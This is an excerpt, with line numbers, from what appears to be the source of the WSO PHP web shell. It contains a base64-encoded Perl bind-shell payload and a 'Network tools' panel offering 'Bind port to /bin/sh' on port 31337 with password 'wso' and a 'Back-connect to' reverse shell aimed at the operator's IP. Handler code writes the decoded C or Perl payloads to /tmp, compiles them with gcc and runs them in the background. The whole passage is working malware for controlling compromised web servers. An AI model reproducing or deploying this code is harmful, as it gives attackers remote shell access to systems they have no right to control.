1114 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1115
1116?>
1117 <h1>Network tools</h1><div class=content>
1118 <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);
1119return false;
1120">
1121 <span>Bind port to /bin/sh</span><br/>
1122 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
1123 </form>
1124 <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);
1125return false;
1126">
1127 <span>Back-connect to</span><br/>
1128 Server: <input type='text' name='server' value='
1129<?php echo $_SERVER['REMOTE_ADDR']
1130?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
1131 </form><br>
1132
1133<?php if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents');
1134 if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1135 @fclose($w);
1136 } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c);
1137 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1138 @unlink("/tmp/bp.c");
1139 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1140 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1141 } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p);
1142 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1143 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1144 } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c);
1145 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1146 @unlink("/tmp/bc.c");
1147 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1148 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1149 } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p);
1150 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1151 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1152 } } echo '</div>';
1153 printFooter();
1154 } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action;
1155 else $_POST['a'] = 'SecInfo';
1156 if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']);
1157
1158?>